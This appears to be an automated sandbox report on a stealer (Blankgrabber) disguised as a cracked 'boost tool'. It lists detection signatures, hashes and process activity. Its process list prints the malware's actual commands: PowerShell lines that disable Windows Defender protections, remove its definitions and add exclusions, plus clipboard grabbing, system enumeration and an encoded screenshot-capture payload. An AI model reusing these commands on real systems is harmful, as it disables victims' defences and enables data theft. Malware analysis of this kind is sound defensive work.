Analysis Overview
SHA256
a87cd76b25f1927111bb0d8c81585861dc614dbb84612351b2d909aa5dd97f63
Threat Level: Known bad
The file boostup_boost_tool_cracked.zip was found to be: Known bad.
Malicious Activity Summary
A stealer written in Python and packaged with Pyinstaller
Blankgrabber family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks BIOS information in registry
Themida packer
Reads user/profile data of web browsers
UPX packed file
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Looks up external IP address via web service
Accesses cryptocurrency files/wallets, possible credential harvesting
Enumerates physical storage devices
Unsigned PE
Detects videocard installed
Gathers system information
Suspicious use of AdjustPrivilegeToken
Enumerates processes with tasklist
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-20 00:05
Signatures
A stealer written in Python and packaged with Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blankgrabber family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-20 00:05
Reported
2024-06-20 00:08
Platform
win7-20240611-en
Max time kernel
120s
Max time network
122s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2028 wrote to memory of 2292 | N/A | C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe | C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe |
| PID 2028 wrote to memory of 2292 | N/A | C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe | C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe |
| PID 2028 wrote to memory of 2292 | N/A | C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe | C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"
C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI20282\python311.dll
| MD5 | 5f6fd64ec2d7d73ae49c34dd12cedb23 |
| SHA1 | c6e0385a868f3153a6e8879527749db52dce4125 |
| SHA256 | ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967 |
| SHA512 | c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab |
memory/2292-24-0x000007FEF5B60000-0x000007FEF6149000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-20 00:05
Reported
2024-06-20 00:08
Platform
win7-20240221-en
Max time kernel
118s
Max time network
120s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked.zip
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-20 00:05
Reported
2024-06-20 00:08
Platform
win10v2004-20240508-en
Max time kernel
51s
Max time network
54s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-20 00:05
Reported
2024-06-20 00:08
Platform
win7-20240221-en
Max time kernel
140s
Max time network
119s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\system32\rundll32.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\system32\rundll32.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\system32\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2884 wrote to memory of 2896 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2884 wrote to memory of 2896 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
| PID 2884 wrote to memory of 2896 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\WerFault.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2884 -s 116
Network
Files
memory/2884-1-0x0000000072DB0000-0x000000007378F000-memory.dmp
memory/2884-4-0x0000000072DB0000-0x000000007378F000-memory.dmp
memory/2884-0-0x0000000072DB0000-0x000000007378F000-memory.dmp
memory/2884-6-0x0000000072DB0000-0x000000007378F000-memory.dmp
memory/2884-5-0x0000000072DB0000-0x000000007378F000-memory.dmp
memory/2884-3-0x0000000072DB0000-0x000000007378F000-memory.dmp
memory/2884-2-0x0000000072DB0000-0x000000007378F000-memory.dmp
memory/2884-7-0x0000000072DB0000-0x000000007378F000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-20 00:05
Reported
2024-06-20 00:08
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_4496_133633155738023538\loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI37122\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"
C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()"
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\onefile_4496_133633155738023538\loader.exe
bound.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start main.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ ‌ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ ‌ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwB